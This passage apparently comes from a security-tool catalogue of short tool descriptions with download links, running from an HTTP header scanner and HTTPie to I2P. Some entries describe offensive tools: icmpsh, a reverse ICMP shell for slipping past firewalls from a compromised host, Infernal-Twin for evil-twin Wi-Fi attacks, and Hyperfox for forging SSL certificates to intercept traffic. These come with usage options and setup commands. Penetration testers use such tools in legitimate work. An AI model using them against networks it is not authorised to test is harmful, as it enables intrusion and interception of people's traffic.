  4. rssurl.txt (Path: feeds->rssurl.txt): Specify the RSS feeds to fetch vulnerability-related information.
    • Example -
  5. url.txt (Path: feeds->url.txt): Specify the list of the URLs from where tool will pull malicious IP addresses information.
    • Example - 

Threat Intel module can be executed from HookAnalyser3.2.exe (option #6) file or can be executed directly through ThreatIntel.exe file. Refer to the following screenshots -



In manual mode, you'd need to provide filename as an argument. Example below -



Important note - The software shall only be used for "NON-COMMERCIAL" purposes. For commercial usage, written permission from the Author must be obtained prior to use.


Download Hook Analyser 3.2

Hsecscan - A Security Scanner For HTTP Response Headers

hsecscan
A security scanner for HTTP response headers.

Requirements
Python 2.x

Usage
$ ./hsecscan.py 
usage: hsecscan.py [-h] [-P] [-p] [-u URL] [-R] [-U User-Agent]
                   [-d 'POST data'] [-x PROXY]

A security scanner for HTTP response headers.

optional arguments:
  -h, --help            show this help message and exit
  -P, --database        Print the entire response headers database.
  -p, --headers         Print only the enabled response headers from database.
  -u URL, --URL URL     The URL to be scanned.
  -R, --redirect        Print redirect headers.
  -U User-Agent, --useragent User-Agent
                        Set the User-Agent request header (default: hsecscan).
  -d 'POST data', --postdata 'POST data'
                        Set the POST data (between single quotes) otherwise
                        will be a GET (example: '{ "q":"query string",
                        "foo":"bar" }').
  -x PROXY, --proxy PROXY
                        Set the proxy server (example: 192.168.1.1:8080).


Example
$ ./hsecscan.py -u https://google.com
>> RESPONSE INFO <<
URL: https://www.google.com.br/?gfe_rd=cr&ei=Qlg_Vu-WHqWX8QeHraH4DQ
Code: 200
Headers:
 Date: Sun, 08 Nov 2015 14:12:18 GMT
 Expires: -1
 Cache-Control: private, max-age=0
 Content-Type: text/html; charset=ISO-8859-1
 P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
 Server: gws
 X-XSS-Protection: 1; mode=block
 X-Frame-Options: SAMEORIGIN
 Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.br
 Set-Cookie: NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgzt-oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.google.com.br; HttpOnly
 Alternate-Protocol: 443:quic,p=1
 Alt-Svc: quic="www.google.com:443"; p="1"; ma=600,quic=":443"; p="1"; ma=600
 Accept-Ranges: none
 Vary: Accept-Encoding
 Connection: close

>> RESPONSE HEADERS DETAILS <<
Header Field Name: X-XSS-Protection
Value: 1; mode=block
Reference: http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx
Security Description: This header enables the Cross-site scripting (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. This header is supported in IE 8+, and in Chrome (not sure which versions). The anti-XSS filter was added in Chrome 4. Its unknown if that version honored this header.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Use "X-XSS-Protection: 1; mode=block" whenever is possible (ref. http://blogs.msdn.com/b/ieinternals/archive/2011/01/31/controlling-the-internet-explorer-xss-filter-with-the-x-xss-protection-http-header.aspx).
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: Set-Cookie
Value: PREF=ID=1111111111111111:FF=0:TM=1446991938:LM=1446991938:V=1:S=wT722CJeTI8DR-6b; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.br, NID=73=IQTBy8sF0rXq3cu2hb3JHIYqEarBeft7Ciio6uPF2gChn2tj34-kRocXzBwPb6-BLABp0grZvHf7LQnRQ9Z_YhGgzt-oFrns3BMSIGoGn4BWBA48UtsFw4OsB5RZ4ODz1rZb9XjCYemyZw7e5ZJ5pWftv5DPul0; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.google.com.br; HttpOnly
Reference: https://tools.ietf.org/html/rfc6265
Security Description: Cookies have a number of security pitfalls. In particular, cookies encourage developers to rely on ambient authority for authentication, often becoming vulnerable to attacks such as cross-site request forgery. Also, when storing session identifiers in cookies, developers often create session fixation vulnerabilities. Transport-layer encryption, such as that employed in HTTPS, is insufficient to prevent a network attacker from obtaining or altering a victim's cookies because the cookie protocol itself has various vulnerabilities. In addition, by default, cookies do not provide confidentiality or integrity from network attackers, even when used in conjunction with HTTPS.
Security Reference: https://tools.ietf.org/html/rfc6265#section-8
Recommendations: Please at least read these references: https://tools.ietf.org/html/rfc6265#section-8 and https://www.owasp.org/index.php/Session_Management_Cheat_Sheet#Cookies.
CWE: CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
CWE URL: https://cwe.mitre.org/data/definitions/614.html

Header Field Name: Accept-Ranges
Value: none
Reference: https://tools.ietf.org/html/rfc7233#section-2.3
Security Description: Unconstrained multiple range requests are susceptible to denial-of-service attacks because the effort required to request many overlapping ranges of the same data is tiny compared to the time, memory, and bandwidth consumed by attempting to serve the requested data in many parts.
Security Reference: https://tools.ietf.org/html/rfc7233#section-6
Recommendations: Servers ought to ignore, coalesce, or reject egregious range requests, such as requests for more than two overlapping ranges or for many small ranges in a single set, particularly when the ranges are requested out of order for no apparent reason.
CWE: CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion')
CWE URL: https://cwe.mitre.org/data/definitions/400.html

Header Field Name: Expires
Value: -1
Reference: https://tools.ietf.org/html/rfc7234#section-5.3
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:

Header Field Name: Vary
Value: Accept-Encoding
Reference: https://tools.ietf.org/html/rfc7231#section-7.1.4
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:

Header Field Name: Server
Value: gws
Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Security Description: Overly long and detailed Server field values increase response latency and potentially reveal internal implementation details that might make it (slightly) easier for attackers to find and exploit known security holes.
Security Reference: https://tools.ietf.org/html/rfc7231#section-7.4.2
Recommendations: An origin server SHOULD NOT generate a Server field containing needlessly fine-grained detail and SHOULD limit the addition of subproducts by third parties.
CWE: CWE-200: Information Exposure
CWE URL: https://cwe.mitre.org/data/definitions/200.html

Header Field Name: Connection
Value: close
Reference: https://tools.ietf.org/html/rfc7230#section-6.1
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:

Header Field Name: Cache-Control
Value: private, max-age=0
Reference: https://tools.ietf.org/html/rfc7234#section-5.2
Security Description: Caches expose additional potential vulnerabilities, since the contents of the cache represent an attractive target for malicious exploitation.  Because cache contents persist after an HTTP request is complete, an attack on the cache can reveal information long after a user believes that the information has been removed from the network.  Therefore, cache contents need to be protected as sensitive information.
Security Reference: https://tools.ietf.org/html/rfc7234#section-8
Recommendations: Do not store unnecessarily sensitive information in the cache.
CWE: CWE-524: Information Exposure Through Caching
CWE URL: https://cwe.mitre.org/data/definitions/524.html

Header Field Name: Date
Value: Sun, 08 Nov 2015 14:12:18 GMT
Reference: https://tools.ietf.org/html/rfc7231#section-7.1.1.2
Security Description:
Security Reference:
Recommendations:
CWE:
CWE URL:

Header Field Name: P3P
Value: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Reference: http://www.w3.org/TR/P3P11/#syntax_ext
Security Description: While P3P itself does not include security mechanisms, it is intended to be used in conjunction with security tools. Users' personal information should always be protected with reasonable security safeguards in keeping with the sensitivity of the information.
Security Reference: http://www.w3.org/TR/P3P11/#principles_security
Recommendations: -
CWE: -
CWE URL: -

Header Field Name: Content-Type
Value: text/html; charset=ISO-8859-1
Reference: https://tools.ietf.org/html/rfc7231#section-3.1.1.5
Security Description: In practice, resource owners do not always properly configure their origin server to provide the correct Content-Type for a given representation, with the result that some clients will examine a payload's content and override the specified type. Clients that do so risk drawing incorrect conclusions, which might expose additional security risks (e.g., "privilege escalation").
Security Reference: https://tools.ietf.org/html/rfc7231#section-3.1.1.5
Recommendations: Properly configure their origin server to provide the correct Content-Type for a given representation.
CWE: CWE-430: Deployment of Wrong Handler
CWE URL: https://cwe.mitre.org/data/definitions/430.html

Header Field Name: X-Frame-Options
Value: SAMEORIGIN
Reference: https://tools.ietf.org/html/rfc7034
Security Description: The use of "X-Frame-Options" allows a web page from host B to declare that its content (for example, a button, links, text, etc.) must not be displayed in a frame (<frame> or <iframe>) of another page (e.g., from host A). This is done by a policy declared in the HTTP header and enforced by browser implementations.
Security Reference: https://tools.ietf.org/html/rfc7034
Recommendations:  In 2009 and 2010, many browser vendors ([Microsoft-X-Frame-Options] and [Mozilla-X-Frame-Options]) introduced the use of a non-standard HTTP [RFC2616] header field "X-Frame-Options" to protect against clickjacking. Please check here https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet what's the best option for your case.
CWE: CWE-693: Protection Mechanism Failure
CWE URL: https://cwe.mitre.org/data/definitions/693.html

>> RESPONSE MISSING HEADERS <<
Header Field Name: Pragma
Reference: https://tools.ietf.org/html/rfc7234#section-5.4
Security Description: Caches expose additional potential vulnerabilities, since the contents of the cache represent an attractive target for malicious exploitation.
Security Reference: https://tools.ietf.org/html/rfc7234#section-8
Recommendations: The "Pragma" header field allows backwards compatibility with HTTP/1.0 caches, so that clients can specify a "no-cache" request that they will understand (as Cache-Control was not defined until HTTP/1.1). When the Cache-Control header field is also present and understood in a request, Pragma is ignored. Define "Pragma: no-cache" whenever is possible.
CWE: CWE-524: Information Exposure Through Caching
CWE URL: https://cwe.mitre.org/data/definitions/524.html

Header Field Name: Public-Key-Pins
Reference: https://tools.ietf.org/html/rfc7469
Security Description: HTTP Public Key Pinning (HPKP) is a trust on first use security mechanism which protects HTTPS websites from impersonation using fraudulent certificates issued by compromised certificate authorities. The security context or pinset data is supplied by the site or origin.
Security Reference: https://tools.ietf.org/html/rfc7469
Recommendations: Deploying Public Key Pinning (PKP) safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a set of SPKIs that becomes invalid. With care, host operators can greatly reduce the risk of man-in-the-middle (MITM) attacks and other false- authentication problems for their users without incurring undue risk. PKP is meant to be used together with HTTP Strict Transport Security (HSTS) [RFC6797], but it is possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
CWE URL: https://cwe.mitre.org/data/definitions/295.html

Header Field Name: Public-Key-Pins-Report-Only
Reference: https://tools.ietf.org/html/rfc7469
Security Description: HTTP Public Key Pinning (HPKP) is a trust on first use security mechanism which protects HTTPS websites from impersonation using fraudulent certificates issued by compromised certificate authorities. The security context or pinset data is supplied by the site or origin.
Security Reference: https://tools.ietf.org/html/rfc7469
Recommendations: Deploying Public Key Pinning (PKP) safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a set of SPKIs that becomes invalid. With care, host operators can greatly reduce the risk of man-in-the-middle (MITM) attacks and other false- authentication problems for their users without incurring undue risk. PKP is meant to be used together with HTTP Strict Transport Security (HSTS) [RFC6797], but it is possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
CWE URL: https://cwe.mitre.org/data/definitions/295.html

Header Field Name: Strict-Transport-Security
Reference: https://tools.ietf.org/html/rfc6797
Security Description: HTTP Strict Transport Security (HSTS) is a web security policy mechanism which helps to protect secure HTTPS websites against downgrade attacks and cookie hijacking. It allows web servers to declare that web browsers (or other complying user agents) should only interact with it using secure HTTPS connections, and never via the insecure HTTP protocol. HSTS is an IETF standards track protocol and is specified in RFC 6797.
Security Reference: https://tools.ietf.org/html/rfc6797
Recommendations: Please at least read this reference: https://www.owasp.org/index.php/HTTP_Strict_Transport_Security.
CWE: CWE-311: Missing Encryption of Sensitive Data
CWE URL: https://cwe.mitre.org/data/definitions/311.html

Header Field Name: Frame-Options
Reference: https://tools.ietf.org/html/rfc7034
Security Description: The use of "X-Frame-Options" allows a web page from host B to declare that its content (for example, a button, links, text, etc.) must not be displayed in a frame (<frame> or <iframe>) of another page (e.g., from host A). This is done by a policy declared in the HTTP header and enforced by browser implementations.
Security Reference: https://tools.ietf.org/html/rfc7034
Recommendations:  In 2009 and 2010, many browser vendors ([Microsoft-X-Frame-Options] and [Mozilla-X-Frame-Options]) introduced the use of a non-standard HTTP [RFC2616] header field "X-Frame-Options" to protect against clickjacking. Please check here https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet what's the best option for your case.
CWE: CWE-693: Protection Mechanism Failure
CWE URL: https://cwe.mitre.org/data/definitions/693.html

Header Field Name: X-Content-Type-Options
Reference: http://blogs.msdn.com/b/ie/archive/2008/09/02/ie8-security-part-vi-beta-2-update.aspx
Security Description: The only defined value, "nosniff", prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. This also applies to Google Chrome, when downloading extensions. This reduces exposure to drive-by download attacks and sites serving user uploaded content that, by clever naming, could be treated by MSIE as executable or dynamic HTML files.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Always use the only defined value, "nosniff".
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: Content-Security-Policy
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not a easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: X-Content-Security-Policy
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not a easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: X-WebKit-CSP
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not a easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: Content-Security-Policy-Report-Only
Reference: http://www.w3.org/TR/CSP/
Security Description: Like Content-Security-Policy, but only reports. Useful during implementation, tuning and testing efforts.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not a easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html


Download Hsecscan

HTTPie - a CLI, cURL-like tool for humans


HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.

HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Main Features
  • Expressive and intuitive syntax
  • Formatted and colorized terminal output
  • Built-in JSON support
  • Forms and file uploads
  • HTTPS, proxies, and authentication
  • Arbitrary request data
  • Custom headers
  • Persistent sessions
  • Wget-like downloads
  • Python 2.6, 2.7 and 3.x support
  • Linux, Mac OS X and Windows support
  • Plugins
  • Documentation
  • Test coverage

Installation

On Mac OS X, HTTPie can be installed via Homebrew:
$ brew install httpie
Most Linux distributions provide a package that can be installed using the system package manager, e.g.:
# Debian-based distributions such as Ubuntu:
$ apt-get install httpie

# RPM-based distributions:
$ yum install httpie
A universal installation method (that works on Windows, Mac OS X, Linux, …, and provides the latest version) is to use pip:
# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools

$ pip install --upgrade httpie
(If pip installation fails for some reason, you can try easy_install httpie as a fallback.)

Development version
The latest development version can be installed directly from GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD

# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master

Usage

Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
See also http --help.

Examples
Custom HTTP method, HTTP headers and JSON data:
$ http PUT example.org X-API-Token:123 name=John
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output options:
$ http -v example.org
Use Github API to post a comment on an issue with authentication:
$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'
Upload a file using redirected input:
$ http example.org < file.json
Download a file and save it via redirected output:
$ http example.org/file > file
Download a file wget style:
$ http --download example.org/file
Use named sessions to make certain aspects or the communication persistent between requests to the same host:
$ http --session=logged-in -a username:password httpbin.org/get API-Key:123$ http --session=logged-in httpbin.org/headers
Set a custom Host header to work around missing DNS records:
$ http localhost:8000 Host:example.com

What follows is a detailed documentation. It covers the command syntax, advanced usage, and also features additional examples.

HTTP Method

The name of the HTTP method comes right before the URL argument:
$ http DELETE example.org/todos/7
Which looks similar to the actual Request-Line that is sent:
DELETE /todos/7 HTTP/1.1
When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST (with request data).

Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly, http://, and can be omitted from the argument – http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example :3000 would expand to http://localhost:3000 If the port is omitted, then port 80 is assumed.
$ http :/foo
GET /foo HTTP/1.1
Host: localhost
$ http :3000/bar
GET /bar HTTP/1.1
Host: localhost:3000
$ http :
GET / HTTP/1.1
Host: localhost
If you find yourself manually constructing URLs with querystring parameters on the terminal, you may appreciate the param==value syntax for appending URL parameters so that you don't have to worry about escaping the & separators. To search for HTTPie on Google Images you could use this command:
$ http GET www.google.com search==HTTPie tbm==isch
GET /?search=HTTPie&tbm=isch HTTP/1.1


Download HTTPie

HTTPNetworkSniffer v1.50 - Packet Sniffer Tool That Captures All HTTP Requests/Responses


HTTPNetworkSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server and displays them in a simple table. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more...

You can easily select one or more HTTP information lines, and then export them to text/html/xml/csv file or copy them to the clipboard and then paste them into Excel.

System Requirements
  • This utility works on any version of Windows, starting from Windows 2000 and up to Windows 10, including 64-bit systems.
  • One of the following capture drivers is required to use HTTPNetworkSniffer:
    • WinPcap Capture Driver: WinPcap is an open source capture driver that allows you to capture network packets on any version of Windows. You can download and install the WinPcap driver from this Web page.
    • Microsoft Network Monitor Driver version 2.x (Only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by HTTPNetworkSniffer, but this driver is not installed by default, and you have to manually install it, by using one of the following options:
    • Microsoft Network Monitor Driver version 3.x: Microsoft provides a new version of Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. 
      The new version of Microsoft Network Monitor (3.x) is available to download from Microsoft Web site.
  • You can also try to use HTTPNetworkSniffer without installing any driver, by using the 'Raw Sockets' method. Unfortunately, Raw Sockets method has many problems:
    • It doesn't work in all Windows systems, depending on Windows version, service pack, and the updates installed on your system.
    • On Windows 7 with UAC turned on, 'Raw Sockets' method only works when you run HTTPNetworkSniffer with 'Run As Administrator'. 

Start Using HTTPNetworkSniffer

Except of a capture driver needed for capturing network packets, HTTPNetworkSniffer doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - HTTPNetworkSniffer.exe

After running HTTPNetworkSniffer in the first time, the 'Capture Options' window appears on the screen, and you're requested to choose the capture method and the desired network adapter. In the next time that you use HTTPNetworkSniffer, it'll automatically start capturing packets with the capture method and the network adapter that you previously selected. You can always change the 'Capture Options' again by pressing F9.

After choosing the capture method and network adapter, HTTPNetworkSniffer captures and displays every HTTP request/response sent between your Web browser and the remote Web server.

Command-Line Options

/load_file_pcap <Filename> Loads the specified capture file, created by WinPcap driver.
/load_file_netmon <Filename> Loads the specified capture file, created by Network Monitor driver 3.x.   


Download HTTPNetworkSniffer v1.50

Hyperfox - HTTP and HTTPs Traffic Interceptor


Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.

Hyperfox is capable of forging SSL certificates on the fly using a root CA certificate and its corresponding key (both provided by the user). If the target machine recognizes the root CA as trusted, then HTTPs traffic can be succesfully intercepted and recorded.

Hyperfox saves captured data to a SQLite database for later inspection and also provides a web interface for watching live traffic and downloading wire formatted messages.


Download Hyperfox

I2P - The Invisible Internet Project


I2P is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other. The network itself is strictly message based (a la IP), but there is a library available to allow reliable streaming communication on top of it (a la TCP). All communication is end to end encrypted (in total there are four layers of encryption used when sending a message), and even the end points ("destinations") are cryptographic identifiers (essentially a pair of public keys).

How does it work?

To anonymize the messages sent, each client application has their I2P "router" build a few inbound and outbound "tunnels" - a sequence of peers that pass messages in one direction (to and from the client, respectively). In turn, when a client wants to send a message to another client, the client passes that message out one of their outbound tunnels targeting one of the other client's inbound tunnels, eventually reaching the destination. Every participant in the network chooses the length of these tunnels, and in doing so, makes a tradeoff between anonymity, latency, and throughput according to their own needs. The result is that the number of peers relaying each end to end message is the absolute minimum necessary to meet both the sender's and the receiver's threat model.

The first time a client wants to contact another client, they make a query against the fully distributed "network database" - a custom structured distributed hash table (DHT) based off the Kademlia algorithm. This is done to find the other client's inbound tunnels efficiently, but subsequent messages between them usually includes that data so no further network database lookups are required.

What can you do with it?

Within the I2P network, applications are not restricted in how they can communicate - those that typically use UDP can make use of the base I2P functionality, and those that typically use TCP can use the TCP-like streaming library. We have a generic TCP/I2P bridge application ("I2PTunnel") that enables people to forward TCP streams into the I2P network as well as to receive streams out of the network and forward them towards a specific TCP/IP address.

I2PTunnel is currently used to let people run their own anonymous website ("eepsite") by running a normal webserver and pointing an I2PTunnel 'server' at it, which people can access anonymously over I2P with a normal web browser by running an I2PTunnel HTTP proxy ("eepproxy"). In addition, we use the same technique to run an anonymous IRC network (where the IRC server is hosted anonymously, and standard IRC clients use an I2PTunnel to contact it). There are other application development efforts going on as well, such as one to build an optimized swarming file transfer application (a la BitTorrent), a distributed data store (a la Freenet / MNet), and a blogging system (a fully distributed LiveJournal), but those are not ready for use yet.

I2P is not inherently an "outproxy" network - the client you send a message to is the cryptographic identifier, not some IP address, so the message must be addressed to someone running I2P. However, it is possible for that client to be an outproxy, allowing you to anonymously make use of their Internet connection. To demonstrate this, the "eepproxy" will accept normal non-I2P URLs (e.g. "http://www.i2p.net") and forward them to a specific destination that runs a squid HTTP proxy, allowing simple anonymous browsing of the normal web. Simple outproxies like that are not viable in the long run for several reasons (including the cost of running one as well as the anonymity and security issues they introduce), but in certain circumstances the technique could be appropriate.

The I2P development team is an open group, welcome to all who are interested in getting involved, and all of the code is open source. The core I2P SDK and the current router implementation is done in Java (currently working with both sun and kaffe, gcj support planned for later), and there is a simple socket based API for accessing the network from other languages (with a C library available, and both Python and Perl in development). The network is actively being developed and has not yet reached the 1.0 release, but the current roadmap describes our schedule.


Download I2P

icmpsh - Simple Reverse ICMP Shell


Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell.

However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus on this tool.

Description

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run onto the target machine.

The tool is clean, easy and portable. The slave (client) runs on the target Windows machine, it is written in C and works on Windows only whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl.

Features
  • Open source software - primarily coded by Nico, forked by me.
  • Client/server architecture.
  • The master is portable across any platform that can run either C, Perl or Python code.
  • The target system has to be Windows because the slave runs on that platform only for now.
  • The user running the slave on the target system does not require administrative privileges.

Usage

Running the master

The master is straight forward to use. There are no extra libraries required for the C and Python versions. The Perl master however has the following dependencies:
  • IO::Socket
  • NetPacket::IP
  • NetPacket::ICMP
When running the master, don't forget to disable ICMP replies by the OS. For example:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive commands send from the master.

Running the slave

The slave comes with a few command line options as outlined below:
-t host            host ip address to send ping requests to. This option is mandatory!

-r                 send a single test icmp request containing the string "Test1234" and then quit. 
                   This is for testing the connection.

-d milliseconds    delay between requests in milliseconds 

-o milliseconds    timeout of responses in milliseconds. If a response has not received in time, 
                   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
                   The counter is set back to 0 if a response was received.

-b num             limit of blanks (unanswered icmp requests before quitting

-s bytes           maximal data buffer size in bytes 
In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.


Download icmpsh

Infernal-Twin - This Is Evil Twin Attack Automated (Wireless Hacking)


This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.

Usage
sudo python InfernalWireless.py

How to install
$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql

$ sudo apt-get install python-scapy 
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb

$ sudo apt-get install aircrack-ng

$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin


$ python db_connect_creds.py 
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root

FAQ:

I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be few issues with Database connectivity. The solution is to create a new user on the database and use that user for launching the tool. Follow the following steps.
  1. Delete dbconnect.conf file from the Infernalwireless folder
  2. Run the following command from your mysql console.
    mysql> use mysql;
    mysql> CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
    mysql> GRANT ALL PRIVILEGES ON \*.\* TO 'root2'@'localhost' WITH GRANT OPTION;
  3. Try to run the tool again.

Release Notes:

New Features:
  • GUI Wireless security assessment SUIT
  • Impelemented
  • WPA2 hacking
  • WEP Hacking
  • WPA2 Enterprise hacking
  • Wireless Social Engineering
  • SSL Strip
  • Report generation
  • PDF Report
  • HTML Report
  • Note taking function
  • Data is saved into Database
  • Network mapping
  • MiTM
  • Probe Request

Changes:
  • Improved compatibility
  • Report improvement
  • Better NAT Rules

Bug Fixes:
  • Wireless Evil Access Point traffic redirect
  • Fixed WPA2 Cracking
  • Fixed Infernal Wireless
  • Fixed Free AP
  • Check for requirements
  • DB implementation via config file
  • Improved Catch and error
  • Check for requirements
  • Works with Kali 2

Coming Soon:
  • Parsing t-shark log files for gathering creds and more
  • More attacks.

Expected bugs:
  • Wireless card might not be supported
  • Windodw might crash
  • Freeze
  • A lot of work to be done, but this tool is still being developed.


Download Infernal-Twin

Instant PDF Password Protector - Password Protect PDF file


Instant PDF Password Protector is the Free tool to quickly Password Protect PDF file on your system.

With a click of button, you can lock or protect any of your sensitive/private PDF documents. You can also use any of the standard Encryption methods - RC4/AES (40-bit, 128-bit, 256-bit) based upon the desired security level.

In addition to this, it also helps you set advanced restrictions to prevent Printing, Copying or Modification of target PDF file. To further secure it, you can also set 'Owner Password' (also called Permissions Password) to stop anyone from removing these restrictions.

'PDF Password Protector' includes Installer for quick installation/un-installation. It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Features
  • Instantly Password Protect PDF document with a click of button
  • Supports all versions of PDF documents
  • Lock PDF file with Password (User/Document Open Password)
  • Supports all the standard Encryption methods - RC4/AES (40-bit,128-bit, 256-bit)
  • [Advanced] Protect PDF file by adding following Restrictions
    • Copying
    • Printing
    • Signing
    • Commenting
    • Changing the Document
    • Document Assembly
    • Page Extraction
    • Filling of Form Fields
  • [Advanced] Set the Permission Password (Owner Password) to prevent removal of above restrictions
  • Advanced Settings Dialog to quickly alter above permissions/restrictions
  • Drag & Drop support for easier selection of PDF file
  • Very easy to use with simple & attractive GUI screen
  • Support for local Installation and uninstallation of the software

Download Instant PDF Password Protector

InstaRecon - Automated Digital Reconnaissance


Automated basic digital reconnaissance. Great for getting an initial footprint of your targets and discovering additional subdomains. InstaRecon will do:
  • DNS (direct, PTR, MX, NS) lookups
  • Whois (domains and IP) lookups
  • Google dorks in search of subdomains
  • Shodan lookups
  • Reverse DNS lookups on entire CIDRs

